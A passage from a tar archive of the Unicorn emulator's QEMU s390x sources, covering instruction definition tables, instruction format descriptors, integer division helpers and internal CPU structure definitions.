V, 0, 0, 0, 0, vesv, 0, IF_VEC) F(0xe738, VESRL, VRS_a, V, la2, 0, 0, 0, ves, 0, IF_VEC) /* VECTOR SHIFT LEFT */ F(0xe774, VSL, VRR_c, V, 0, 0, 0, 0, vsl, 0, IF_VEC) /* VECTOR SHIFT LEFT BY BYTE */ F(0xe775, VSLB, VRR_c, V, 0, 0, 0, 0, vsl, 0, IF_VEC) /* VECTOR SHIFT LEFT DOUBLE BY BYTE */ F(0xe777, VSLDB, VRI_d, V, 0, 0, 0, 0, vsldb, 0, IF_VEC) /* VECTOR SHIFT RIGHT ARITHMETIC */ F(0xe77e, VSRA, VRR_c, V, 0, 0, 0, 0, vsra, 0, IF_VEC) /* VECTOR SHIFT RIGHT ARITHMETIC BY BYTE */ F(0xe77f, VSRAB, VRR_c, V, 0, 0, 0, 0, vsra, 0, IF_VEC) /* VECTOR SHIFT RIGHT LOGICAL */ F(0xe77c, VSRL, VRR_c, V, 0, 0, 0, 0, vsrl, 0, IF_VEC) /* VECTOR SHIFT RIGHT LOGICAL BY BYTE */ F(0xe77d, VSRLB, VRR_c, V, 0, 0, 0, 0, vsrl, 0, IF_VEC) /* VECTOR SUBTRACT */ F(0xe7f7, VS, VRR_c, V, 0, 0, 0, 0, vs, 0, IF_VEC) /* VECTOR SUBTRACT COMPUTE BORROW INDICATION */ F(0xe7f5, VSCBI, VRR_c, V, 0, 0, 0, 0, vscbi, 0, IF_VEC) /* VECTOR SUBTRACT WITH BORROW INDICATION */ F(0xe7bf, VSBI, VRR_d, V, 0, 0, 0, 0, vsbi, 0, IF_VEC) /* VECTOR SUBTRACT WITH BORROW COMPUTE BORROW INDICATION */ F(0xe7bd, VSBCBI, VRR_d, V, 0, 0, 0, 0, vsbcbi, 0, IF_VEC) /* VECTOR SUM ACROSS DOUBLEWORD */ F(0xe765, VSUMG, VRR_c, V, 0, 0, 0, 0, vsumg, 0, IF_VEC) /* VECTOR SUM ACROSS QUADWORD */ F(0xe767, VSUMQ, VRR_c, V, 0, 0, 0, 0, vsumq, 0, IF_VEC) /* VECTOR SUM ACROSS WORD */ F(0xe764, VSUM, VRR_c, V, 0, 0, 0, 0, vsum, 0, IF_VEC) /* VECTOR TEST UNDER MASK */ F(0xe7d8, VTM, VRR_a, V, 0, 0, 0, 0, vtm, 0, IF_VEC) /* === Vector String Instructions === */ /* VECTOR FIND ANY ELEMENT EQUAL */ F(0xe782, VFAE, VRR_b, V, 0, 0, 0, 0, vfae, 0, IF_VEC) /* VECTOR FIND ELEMENT EQUAL */ F(0xe780, VFEE, VRR_b, V, 0, 0, 0, 0, vfee, 0, IF_VEC) /* VECTOR FIND ELEMENT NOT EQUAL */ F(0xe781, VFENE, VRR_b, V, 0, 0, 0, 0, vfene, 0, IF_VEC) /* VECTOR ISOLATE STRING */ F(0xe75c, VISTR, VRR_a, V, 0, 0, 0, 0, vistr, 0, IF_VEC) /* VECTOR STRING RANGE COMPARE */ F(0xe78a, VSTRC, VRR_d, V, 0, 0, 0, 0, vstrc, 0, IF_VEC) /* === Vector Floating-Point Instructions */ /* VECTOR FP ADD */ F(0xe7e3, VFA, VRR_c, V, 0, 0, 0, 0, vfa, 0, IF_VEC) /* VECTOR FP COMPARE SCALAR */ F(0xe7cb, WFC, VRR_a, V, 0, 0, 0, 0, wfc, 0, IF_VEC) /* VECTOR FP COMPARE AND SIGNAL SCALAR */ F(0xe7ca, WFK, VRR_a, V, 0, 0, 0, 0, wfc, 0, IF_VEC) /* VECTOR FP COMPARE EQUAL */ F(0xe7e8, VFCE, VRR_c, V, 0, 0, 0, 0, vfc, 0, IF_VEC) /* VECTOR FP COMPARE HIGH */ F(0xe7eb, VFCH, VRR_c, V, 0, 0, 0, 0, vfc, 0, IF_VEC) /* VECTOR FP COMPARE HIGH OR EQUAL */ F(0xe7ea, VFCHE, VRR_c, V, 0, 0, 0, 0, vfc, 0, IF_VEC) /* VECTOR FP CONVERT FROM FIXED 64-BIT */ F(0xe7c3, VCDG, VRR_a, V, 0, 0, 0, 0, vcdg, 0, IF_VEC) /* VECTOR FP CONVERT FROM LOGICAL 64-BIT */ F(0xe7c1, VCDLG, VRR_a, V, 0, 0, 0, 0, vcdg, 0, IF_VEC) /* VECTOR FP CONVERT TO FIXED 64-BIT */ F(0xe7c2, VCGD, VRR_a, V, 0, 0, 0, 0, vcdg, 0, IF_VEC) /* VECTOR FP CONVERT TO LOGICAL 64-BIT */ F(0xe7c0, VCLGD, VRR_a, V, 0, 0, 0, 0, vcdg, 0, IF_VEC) /* VECTOR FP DIVIDE */ F(0xe7e5, VFD, VRR_c, V, 0, 0, 0, 0, vfa, 0, IF_VEC) /* VECTOR LOAD FP INTEGER */ F(0xe7c7, VFI, VRR_a, V, 0, 0, 0, 0, vcdg, 0, IF_VEC) /* VECTOR LOAD LENGTHENED */ F(0xe7c4, VFLL, VRR_a, V, 0, 0, 0, 0, vfll, 0, IF_VEC) /* VECTOR LOAD ROUNDED */ F(0xe7c5, VFLR, VRR_a, V, 0, 0, 0, 0, vcdg, 0, IF_VEC) /* VECTOR FP MULTIPLY */ F(0xe7e7, VFM, VRR_c, V, 0, 0, 0, 0, vfa, 0, IF_VEC) /* VECTOR FP MULTIPLY AND ADD */ F(0xe78f, VFMA, VRR_e, V, 0, 0, 0, 0, vfma, 0, IF_VEC) /* VECTOR FP MULTIPLY AND SUBTRACT */ F(0xe78e, VFMS, VRR_e, V, 0, 0, 0, 0, vfma, 0, IF_VEC) /* VECTOR FP PERFORM SIGN OPERATION */ F(0xe7cc, VFPSO, VRR_a, V, 0, 0, 0, 0, vfpso, 0, IF_VEC) /* VECTOR FP SQUARE ROOT */ F(0xe7ce, VFSQ, VRR_a, V, 0, 0, 0, 0, vfsq, 0, IF_VEC) /* VECTOR FP SUBTRACT */ F(0xe7e2, VFS, VRR_c, V, 0, 0, 0, 0, vfa, 0, IF_VEC) /* VECTOR FP TEST DATA CLASS IMMEDIATE */ F(0xe74a, VFTCI, VRI_e, V, 0, 0, 0, 0, vftci, 0, IF_VEC) #ifndef CONFIG_USER_ONLY /* COMPARE AND SWAP AND PURGE */ E(0xb250, CSP, RRE, Z, r1_32u, ra2, r1_P, 0, csp, 0, MO_TEUL, IF_PRIV) E(0xb98a, CSPG, RRE, DAT_ENH, r1_o, ra2, r1_P, 0, csp, 0, MO_TEQ, IF_PRIV) /* DIAGNOSE (KVM hypercall) */ F(0x8300, DIAG, RSI, Z, 0, 0, 0, 0, diag, 0, IF_PRIV) /* INSERT STORAGE KEY EXTENDED */ F(0xb229, ISKE, RRE, Z, 0, r2_o, new, r1_8, iske, 0, IF_PRIV) /* INVALIDATE DAT TABLE ENTRY */ F(0xb98e, IPDE, RRF_b, Z, r1_o, r2_o, 0, 0, idte, 0, IF_PRIV) /* INVALIDATE PAGE TABLE ENTRY */ F(0xb221, IPTE, RRF_a, Z, r1_o, r2_o, 0, 0, ipte, 0, IF_PRIV) /* LOAD CONTROL */ F(0xb700, LCTL, RS_a, Z, 0, a2, 0, 0, lctl, 0, IF_PRIV) F(0xeb2f, LCTLG, RSY_a, Z, 0, a2, 0, 0, lctlg, 0, IF_PRIV) /* LOAD PROGRAM PARAMETER */ F(0xb280, LPP, S, LPP, 0, m2_64, 0, 0, lpp, 0, IF_PRIV) /* LOAD PSW */ F(0x8200, LPSW, S, Z, 0, a2, 0, 0, lpsw, 0, IF_PRIV) /* LOAD PSW EXTENDED */ F(0xb2b2, LPSWE, S, Z, 0, a2, 0, 0, lpswe, 0, IF_PRIV) /* LOAD REAL ADDRESS */ F(0xb100, LRA, RX_a, Z, 0, a2, r1, 0, lra, 0, IF_PRIV) F(0xe313, LRAY, RXY_a, LD, 0, a2, r1, 0, lra, 0, IF_PRIV) F(0xe303, LRAG, RXY_a, Z, 0, a2, r1, 0, lra, 0, IF_PRIV) /* LOAD USING REAL ADDRESS */ E(0xb24b, LURA, RRE, Z, 0, 0, new, r1_32, lura, 0, MO_TEUL, IF_PRIV) E(0xb905, LURAG, RRE, Z, 0, 0, r1, 0, lura, 0, MO_TEQ, IF_PRIV) /* MOVE TO PRIMARY */ F(0xda00, MVCP, SS_d, Z, la1, a2, 0, 0, mvcp, 0, IF_PRIV) /* MOVE TO SECONDARY */ F(0xdb00, MVCS, SS_d, Z, la1, a2, 0, 0, mvcs, 0, IF_PRIV) /* PURGE TLB */ F(0xb20d, PTLB, S, Z, 0, 0, 0, 0, ptlb, 0, IF_PRIV) /* RESET REFERENCE BIT EXTENDED */ F(0xb22a, RRBE, RRE, Z, 0, r2_o, 0, 0, rrbe, 0, IF_PRIV) /* SERVICE CALL LOGICAL PROCESSOR (PV hypercall) */ F(0xb220, SERVC, RRE, Z, r1_o, r2_o, 0, 0, servc, 0, IF_PRIV) /* SET ADDRESS SPACE CONTROL FAST */ F(0xb279, SACF, S, Z, 0, a2, 0, 0, sacf, 0, IF_PRIV) /* SET CLOCK */ F(0xb204, SCK, S, Z, la2, 0, 0, 0, sck, 0, IF_PRIV) /* SET CLOCK COMPARATOR */ F(0xb206, SCKC, S, Z, 0, m2_64a, 0, 0, sckc, 0, IF_PRIV) /* SET CLOCK PROGRAMMABLE FIELD */ F(0x0107, SCKPF, E, Z, 0, 0, 0, 0, sckpf, 0, IF_PRIV) /* SET CPU TIMER */ F(0xb208, SPT, S, Z, 0, m2_64a, 0, 0, spt, 0, IF_PRIV) /* SET PREFIX */ F(0xb210, SPX, S, Z, 0, m2_32ua, 0, 0, spx, 0, IF_PRIV) /* SET PSW KEY FROM ADDRESS */ F(0xb20a, SPKA, S, Z, 0, a2, 0, 0, spka, 0, IF_PRIV) /* SET STORAGE KEY EXTENDED */ F(0xb22b, SSKE, RRF_c, Z, r1_o, r2_o, 0, 0, sske, 0, IF_PRIV) /* SET SYSTEM MASK */ F(0x8000, SSM, S, Z, 0, m2_8u, 0, 0, ssm, 0, IF_PRIV) /* SIGNAL PROCESSOR */ F(0xae00, SIGP, RS_a, Z, 0, a2, 0, 0, sigp, 0, IF_PRIV) /* STORE CLOCK COMPARATOR */ F(0xb207, STCKC, S, Z, la2, 0, new, m1_64a, stckc, 0, IF_PRIV) /* STORE CONTROL */ F(0xb600, STCTL, RS_a, Z, 0, a2, 0, 0, stctl, 0, IF_PRIV) F(0xeb25, STCTG, RSY_a, Z, 0, a2, 0, 0, stctg, 0, IF_PRIV) /* STORE CPU ADDRESS */ F(0xb212, STAP, S, Z, la2, 0, new, m1_16a, stap, 0, IF_PRIV) /* STORE CPU ID */ F(0xb202, STIDP, S, Z, la2, 0, new, m1_64a, stidp, 0, IF_PRIV) /* STORE CPU TIMER */ F(0xb209, STPT, S, Z, la2, 0, new, m1_64a, stpt, 0, IF_PRIV) /* STORE FACILITY LIST */ F(0xb2b1, STFL, S, Z, 0, 0, 0, 0, stfl, 0, IF_PRIV) /* STORE PREFIX */ F(0xb211, STPX, S, Z, la2, 0, new, m1_32a, stpx, 0, IF_PRIV) /* STORE SYSTEM INFORMATION */ F(0xb27d, STSI, S, Z, 0, a2, 0, 0, stsi, 0, IF_PRIV) /* STORE THEN AND SYSTEM MASK */ F(0xac00, STNSM, SI, Z, la1, 0, 0, 0, stnosm, 0, IF_PRIV) /* STORE THEN OR SYSTEM MASK */ F(0xad00, STOSM, SI, Z, la1, 0, 0, 0, stnosm, 0, IF_PRIV) /* STORE USING REAL ADDRESS */ E(0xb246, STURA, RRE, Z, r1_o, 0, 0, 0, stura, 0, MO_TEUL, IF_PRIV) E(0xb925, STURG, RRE, Z, r1_o, 0, 0, 0, stura, 0, MO_TEQ, IF_PRIV) /* TEST BLOCK */ F(0xb22c, TB, RRE, Z, 0, r2_o, 0, 0, testblock, 0, IF_PRIV) /* TEST PROTECTION */ C(0xe501, TPROT, SSE, Z, la1, a2, 0, 0, tprot, 0) /* CCW I/O Instructions */ F(0xb276, XSCH, S, Z, 0, 0, 0, 0, xsch, 0, IF_PRIV) F(0xb230, CSCH, S, Z, 0, 0, 0, 0, csch, 0, IF_PRIV) F(0xb231, HSCH, S, Z, 0, 0, 0, 0, hsch, 0, IF_PRIV) F(0xb232, MSCH, S, Z, 0, insn, 0, 0, msch, 0, IF_PRIV) F(0xb23b, RCHP, S, Z, 0, 0, 0, 0, rchp, 0, IF_PRIV) F(0xb238, RSCH, S, Z, 0, 0, 0, 0, rsch, 0, IF_PRIV) F(0xb237, SAL, S, Z, 0, 0, 0, 0, sal, 0, IF_PRIV) F(0xb23c, SCHM, S, Z, 0, insn, 0, 0, schm, 0, IF_PRIV) F(0xb274, SIGA, S, Z, 0, 0, 0, 0, siga, 0, IF_PRIV) F(0xb23a, STCPS, S, Z, 0, 0, 0, 0, stcps, 0, IF_PRIV) F(0xb233, SSCH, S, Z, 0, insn, 0, 0, ssch, 0, IF_PRIV) F(0xb239, STCRW, S, Z, 0, insn, 0, 0, stcrw, 0, IF_PRIV) F(0xb234, STSCH, S, Z, 0, insn, 0, 0, stsch, 0, IF_PRIV) F(0xb236, TPI , S, Z, la2, 0, 0, 0, tpi, 0, IF_PRIV) F(0xb235, TSCH, S, Z, 0, insn, 0, 0, tsch, 0, IF_PRIV) /* ??? Not listed in PoO ninth edition, but there's a linux driver that uses it: "A CHSC subchannel is usually present on LPAR only." */ F(0xb25f, CHSC, RRE, Z, 0, insn, 0, 0, chsc, 0, IF_PRIV) /* zPCI Instructions */ /* None of these instructions are documented in the PoP, so this is all based upon target/s390x/kvm.c and Linux code and likely incomplete */ F(0xebd0, PCISTB, RSY_a, PCI, la2, 0, 0, 0, pcistb, 0, IF_PRIV) F(0xebd1, SIC, RSY_a, AIS, r1, r3, 0, 0, sic, 0, IF_PRIV) F(0xb9a0, CLP, RRF_c, PCI, 0, 0, 0, 0, clp, 0, IF_PRIV) F(0xb9d0, PCISTG, RRE, PCI, 0, 0, 0, 0, pcistg, 0, IF_PRIV) F(0xb9d2, PCILG, RRE, PCI, 0, 0, 0, 0, pcilg, 0, IF_PRIV) F(0xb9d3, RPCIT, RRE, PCI, 0, 0, 0, 0, rpcit, 0, IF_PRIV) F(0xe3d0, MPCIFC, RXY_a, PCI, la2, 0, 0, 0, mpcifc, 0, IF_PRIV) F(0xe3d4, STPCIFC, RXY_a, PCI, la2, 0, 0, 0, stpcifc, 0, IF_PRIV) #endif /* CONFIG_USER_ONLY */ �����������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/insn-format.def�����������������������������������������������������0000664�0000000�0000000�00000007602�14675241067�0021251�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Description of s390 insn formats. */ /* NAME F1, F2... */ F0(E) F1(I, I(1, 8, 8)) F2(RI_a, R(1, 8), I(2,16,16)) F2(RI_b, R(1, 8), I(2,16,16)) F2(RI_c, M(1, 8), I(2,16,16)) F3(RIE_a, R(1, 8), I(2,16,16), M(3,32)) F4(RIE_b, R(1, 8), R(2,12), M(3,32), I(4,16,16)) F4(RIE_c, R(1, 8), I(2,32, 8), M(3,12), I(4,16,16)) F3(RIE_d, R(1, 8), I(2,16,16), R(3,12)) F3(RIE_e, R(1, 8), I(2,16,16), R(3,12)) F5(RIE_f, R(1, 8), R(2,12), I(3,16,8), I(4,24,8), I(5,32,8)) F3(RIE_g, R(1, 8), I(2,16,16), M(3,12)) F2(RIL_a, R(1, 8), I(2,16,32)) F2(RIL_b, R(1, 8), I(2,16,32)) F2(RIL_c, M(1, 8), I(2,16,32)) F4(RIS, R(1, 8), I(2,32, 8), M(3,12), BD(4,16,20)) /* ??? The PoO does not call out subtypes _a and _b for RR, as it does for e.g. RX. Our checking requires this for e.g. BCR. */ F2(RR_a, R(1, 8), R(2,12)) F2(RR_b, M(1, 8), R(2,12)) F2(RRE, R(1,24), R(2,28)) F3(RRD, R(1,16), R(2,28), R(3,24)) F4(RRF_a, R(1,24), R(2,28), R(3,16), M(4,20)) F4(RRF_b, R(1,24), R(2,28), R(3,16), M(4,20)) F4(RRF_c, R(1,24), R(2,28), M(3,16), M(4,20)) F4(RRF_d, R(1,24), R(2,28), M(3,16), M(4,20)) F4(RRF_e, R(1,24), R(2,28), M(3,16), M(4,20)) F4(RRS, R(1, 8), R(2,12), M(3,32), BD(4,16,20)) F3(RS_a, R(1, 8), BD(2,16,20), R(3,12)) F3(RS_b, R(1, 8), BD(2,16,20), M(3,12)) F3(RSI, R(1, 8), I(2,16,16), R(3,12)) F2(RSL, L(1, 8, 4), BD(1,16,20)) F3(RSY_a, R(1, 8), BDL(2), R(3,12)) F3(RSY_b, R(1, 8), BDL(2), M(3,12)) F2(RX_a, R(1, 8), BXD(2)) F2(RX_b, M(1, 8), BXD(2)) F3(RXE, R(1, 8), BXD(2), M(3,32)) F3(RXF, R(1,32), BXD(2), R(3, 8)) F2(RXY_a, R(1, 8), BXDL(2)) F2(RXY_b, M(1, 8), BXDL(2)) F1(S, BD(2,16,20)) F2(SI, BD(1,16,20), I(2,8,8)) F2(SIL, BD(1,16,20), I(2,32,16)) F2(SIY, BDL(1), I(2, 8, 8)) F3(SS_a, L(1, 8, 8), BD(1,16,20), BD(2,32,36)) F4(SS_b, L(1, 8, 4), BD(1,16,20), L(2,12,4), BD(2,32,36)) F4(SS_c, L(1, 8, 4), BD(1,16,20), BD(2,32,36), I(3,12, 4)) /* ??? Odd man out. The L1 field here is really a register, but the easy way to compress the fields has R1 and B1 overlap. */ F4(SS_d, L(1, 8, 4), BD(1,16,20), BD(2,32,36), R(3,12)) F4(SS_e, R(1, 8), BD(2,16,20), R(3,12), BD(4,32,36)) F3(SS_f, BD(1,16,20), L(2,8,8), BD(2,32,36)) F2(SSE, BD(1,16,20), BD(2,32,36)) F3(SSF, BD(1,16,20), BD(2,32,36), R(3,8)) F3(VRI_a, V(1,8), I(2,16,16), M(3,32)) F4(VRI_b, V(1,8), I(2,16,8), I(3,24,8), M(4,32)) F4(VRI_c, V(1,8), V(3,12), I(2,16,16), M(4,32)) F5(VRI_d, V(1,8), V(2,12), V(3,16), I(4,24,8), M(5,32)) F5(VRI_e, V(1,8), V(2,12), I(3,16,12), M(5,28), M(4,32)) F5(VRI_f, V(1,8), V(2,12), V(3,16), M(5,24), I(4,28,8)) F5(VRI_g, V(1,8), V(2,12), I(4,16,8), M(5,24), I(3,28,8)) F3(VRI_h, V(1,8), I(2,16,16), I(3,32,4)) F4(VRI_i, V(1,8), R(2,12), M(4,24), I(3,28,8)) F5(VRR_a, V(1,8), V(2,12), M(5,24), M(4,28), M(3,32)) F5(VRR_b, V(1,8), V(2,12), V(3,16), M(5,24), M(4,32)) F6(VRR_c, V(1,8), V(2,12), V(3,16), M(6,24), M(5,28), M(4,32)) F6(VRR_d, V(1,8), V(2,12), V(3,16), M(5,20), M(6,24), V(4,32)) F6(VRR_e, V(1,8), V(2,12), V(3,16), M(6,20), M(5,28), V(4,32)) F3(VRR_f, V(1,8), R(2,12), R(3,16)) F1(VRR_g, V(1,12)) F3(VRR_h, V(1,12), V(2,16), M(3,24)) F3(VRR_i, R(1,8), V(2,12), M(3,24)) F4(VRS_a, V(1,8), V(3,12), BD(2,16,20), M(4,32)) F4(VRS_b, V(1,8), R(3,12), BD(2,16,20), M(4,32)) F4(VRS_c, R(1,8), V(3,12), BD(2,16,20), M(4,32)) F3(VRS_d, R(3,12), BD(2,16,20), V(1,32)) F4(VRV, V(1,8), V(2,12), BD(2,16,20), M(3,32)) F3(VRX, V(1,8), BXD(2), M(3,32)) F3(VSI, I(3,8,8), BD(2,16,20), V(1,32)) ������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/int_helper.c��������������������������������������������������������0000664�0000000�0000000�00000007560�14675241067�0020634�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 integer helper routines * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2009 Alexander Graf * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "tcg_s390x.h" #include "exec/exec-all.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" /* #define DEBUG_HELPER */ #ifdef DEBUG_HELPER #define HELPER_LOG(x, ...) qemu_log(x) #else #define HELPER_LOG(x, ...) #endif /* 64/32 -> 32 signed division */ int64_t HELPER(divs32)(CPUS390XState *env, int64_t a, int64_t b64) { int32_t ret, b = b64; int64_t q; if (b == 0) { tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC()); } ret = q = a / b; env->retxl = a % b; /* Catch non-representable quotient. */ if (ret != q) { tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC()); } return ret; } /* 64/32 -> 32 unsigned division */ uint64_t HELPER(divu32)(CPUS390XState *env, uint64_t a, uint64_t b64) { uint32_t ret, b = b64; uint64_t q; if (b == 0) { tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC()); } ret = q = a / b; env->retxl = a % b; /* Catch non-representable quotient. */ if (ret != q) { tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC()); } return ret; } /* 64/64 -> 64 signed division */ int64_t HELPER(divs64)(CPUS390XState *env, int64_t a, int64_t b) { /* Catch divide by zero, and non-representable quotient (MIN / -1). */ if (b == 0 || (b == -1 && a == (1ll << 63))) { tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC()); } env->retxl = a % b; return a / b; } /* 128 -> 64/64 unsigned division */ uint64_t HELPER(divu64)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t b) { uint64_t ret; /* Signal divide by zero. */ if (b == 0) { tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC()); } if (ah == 0) { /* 64 -> 64/64 case */ env->retxl = al % b; ret = al / b; } else { /* ??? Move i386 idivq helper to host-utils. */ #ifdef CONFIG_INT128 __uint128_t a = ((__uint128_t)ah << 64) | al; __uint128_t q = a / b; env->retxl = a % b; ret = q; if (ret != q) { tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC()); } #else /* 32-bit hosts would need special wrapper functionality - just abort if we encounter such a case; it's very unlikely anyways. */ cpu_abort(env_cpu(env), "128 -> 64/64 division not implemented\n"); #endif } return ret; } uint64_t HELPER(cvd)(int32_t reg) { /* positive 0 */ uint64_t dec = 0x0c; int64_t bin = reg; int shift; if (bin < 0) { bin = -bin; dec = 0x0d; } for (shift = 4; (shift < 64) && bin; shift += 4) { dec |= (bin % 10) << shift; bin /= 10; } return dec; } uint64_t HELPER(popcnt)(uint64_t val) { /* Note that we don't fold past bytes. */ val = (val & 0x5555555555555555ULL) + ((val >> 1) & 0x5555555555555555ULL); val = (val & 0x3333333333333333ULL) + ((val >> 2) & 0x3333333333333333ULL); val = (val + (val >> 4)) & 0x0f0f0f0f0f0f0f0fULL; return val; } ������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/internal.h����������������������������������������������������������0000664�0000000�0000000�00000035326�14675241067�0020325�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * s390x internal definitions and helpers * * Copyright (c) 2009 Ulrich Hecht * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef S390X_INTERNAL_H #define S390X_INTERNAL_H #include "cpu.h" #ifndef CONFIG_USER_ONLY QEMU_PACK(typedef struct LowCore { /* prefix area: defined by architecture */ uint32_t ccw1[2]; /* 0x000 */ uint32_t ccw2[4]; /* 0x008 */ uint8_t pad1[0x80 - 0x18]; /* 0x018 */ uint32_t ext_params; /* 0x080 */ uint16_t cpu_addr; /* 0x084 */ uint16_t ext_int_code; /* 0x086 */ uint16_t svc_ilen; /* 0x088 */ uint16_t svc_code; /* 0x08a */ uint16_t pgm_ilen; /* 0x08c */ uint16_t pgm_code; /* 0x08e */ uint32_t data_exc_code; /* 0x090 */ uint16_t mon_class_num; /* 0x094 */ uint16_t per_perc_atmid; /* 0x096 */ uint64_t per_address; /* 0x098 */ uint8_t exc_access_id; /* 0x0a0 */ uint8_t per_access_id; /* 0x0a1 */ uint8_t op_access_id; /* 0x0a2 */ uint8_t ar_access_id; /* 0x0a3 */ uint8_t pad2[0xA8 - 0xA4]; /* 0x0a4 */ uint64_t trans_exc_code; /* 0x0a8 */ uint64_t monitor_code; /* 0x0b0 */ uint16_t subchannel_id; /* 0x0b8 */ uint16_t subchannel_nr; /* 0x0ba */ uint32_t io_int_parm; /* 0x0bc */ uint32_t io_int_word; /* 0x0c0 */ uint8_t pad3[0xc8 - 0xc4]; /* 0x0c4 */ uint32_t stfl_fac_list; /* 0x0c8 */ uint8_t pad4[0xe8 - 0xcc]; /* 0x0cc */ uint64_t mcic; /* 0x0e8 */ uint8_t pad5[0xf4 - 0xf0]; /* 0x0f0 */ uint32_t external_damage_code; /* 0x0f4 */ uint64_t failing_storage_address; /* 0x0f8 */ uint8_t pad6[0x110 - 0x100]; /* 0x100 */ uint64_t per_breaking_event_addr; /* 0x110 */ uint8_t pad7[0x120 - 0x118]; /* 0x118 */ PSW restart_old_psw; /* 0x120 */ PSW external_old_psw; /* 0x130 */ PSW svc_old_psw; /* 0x140 */ PSW program_old_psw; /* 0x150 */ PSW mcck_old_psw; /* 0x160 */ PSW io_old_psw; /* 0x170 */ uint8_t pad8[0x1a0 - 0x180]; /* 0x180 */ PSW restart_new_psw; /* 0x1a0 */ PSW external_new_psw; /* 0x1b0 */ PSW svc_new_psw; /* 0x1c0 */ PSW program_new_psw; /* 0x1d0 */ PSW mcck_new_psw; /* 0x1e0 */ PSW io_new_psw; /* 0x1f0 */ uint8_t pad13[0x11b0 - 0x200]; /* 0x200 */ uint64_t mcesad; /* 0x11B0 */ /* 64 bit extparam used for pfault, diag 250 etc */ uint64_t ext_params2; /* 0x11B8 */ uint8_t pad14[0x1200 - 0x11C0]; /* 0x11C0 */ /* System info area */ uint64_t floating_pt_save_area[16]; /* 0x1200 */ uint64_t gpregs_save_area[16]; /* 0x1280 */ uint32_t st_status_fixed_logout[4]; /* 0x1300 */ uint8_t pad15[0x1318 - 0x1310]; /* 0x1310 */ uint32_t prefixreg_save_area; /* 0x1318 */ uint32_t fpt_creg_save_area; /* 0x131c */ uint8_t pad16[0x1324 - 0x1320]; /* 0x1320 */ uint32_t tod_progreg_save_area; /* 0x1324 */ uint64_t cpu_timer_save_area; /* 0x1328 */ uint64_t clock_comp_save_area; /* 0x1330 */ uint8_t pad17[0x1340 - 0x1338]; /* 0x1338 */ uint32_t access_regs_save_area[16]; /* 0x1340 */ uint64_t cregs_save_area[16]; /* 0x1380 */ /* align to the top of the prefix area */ uint8_t pad18[0x2000 - 0x1400]; /* 0x1400 */ }) LowCore; QEMU_BUILD_BUG_ON(sizeof(LowCore) != 8192); #endif /* CONFIG_USER_ONLY */ #define MAX_ILEN 6 /* While the PoO talks about ILC (a number between 1-3) what is actually stored in LowCore is shifted left one bit (an even between 2-6). As this is the actual length of the insn and therefore more useful, that is what we want to pass around and manipulate. To make sure that we have applied this distinction universally, rename the "ILC" to "ILEN". */ static inline int get_ilen(uint8_t opc) { switch (opc >> 6) { case 0: return 2; case 1: case 2: return 4; default: return 6; } } /* Compute the ATMID field that is stored in the per_perc_atmid lowcore entry when a PER exception is triggered. */ static inline uint8_t get_per_atmid(CPUS390XState *env) { return ((env->psw.mask & PSW_MASK_64) ? (1 << 7) : 0) | (1 << 6) | ((env->psw.mask & PSW_MASK_32) ? (1 << 5) : 0) | ((env->psw.mask & PSW_MASK_DAT) ? (1 << 4) : 0) | ((env->psw.mask & PSW_ASC_SECONDARY) ? (1 << 3) : 0) | ((env->psw.mask & PSW_ASC_ACCREG) ? (1 << 2) : 0); } static inline uint64_t wrap_address(CPUS390XState *env, uint64_t a) { if (!(env->psw.mask & PSW_MASK_64)) { if (!(env->psw.mask & PSW_MASK_32)) { /* 24-Bit mode */ a &= 0x00ffffff; } else { /* 31-Bit mode */ a &= 0x7fffffff; } } return a; } /* CC optimization */ /* Instead of computing the condition codes after each x86 instruction, * QEMU just stores the result (called CC_DST), the type of operation * (called CC_OP) and whatever operands are needed (CC_SRC and possibly * CC_VR). When the condition codes are needed, the condition codes can * be calculated using this information. Condition codes are not generated * if they are only needed for conditional branches. */ enum cc_op { CC_OP_CONST0 = 0, /* CC is 0 */ CC_OP_CONST1, /* CC is 1 */ CC_OP_CONST2, /* CC is 2 */ CC_OP_CONST3, /* CC is 3 */ CC_OP_DYNAMIC, /* CC calculation defined by env->cc_op */ CC_OP_STATIC, /* CC value is env->cc_op */ CC_OP_NZ, /* env->cc_dst != 0 */ CC_OP_LTGT_32, /* signed less/greater than (32bit) */ CC_OP_LTGT_64, /* signed less/greater than (64bit) */ CC_OP_LTUGTU_32, /* unsigned less/greater than (32bit) */ CC_OP_LTUGTU_64, /* unsigned less/greater than (64bit) */ CC_OP_LTGT0_32, /* signed less/greater than 0 (32bit) */ CC_OP_LTGT0_64, /* signed less/greater than 0 (64bit) */ CC_OP_ADD_64, /* overflow on add (64bit) */ CC_OP_ADDU_64, /* overflow on unsigned add (64bit) */ CC_OP_ADDC_64, /* overflow on unsigned add-carry (64bit) */ 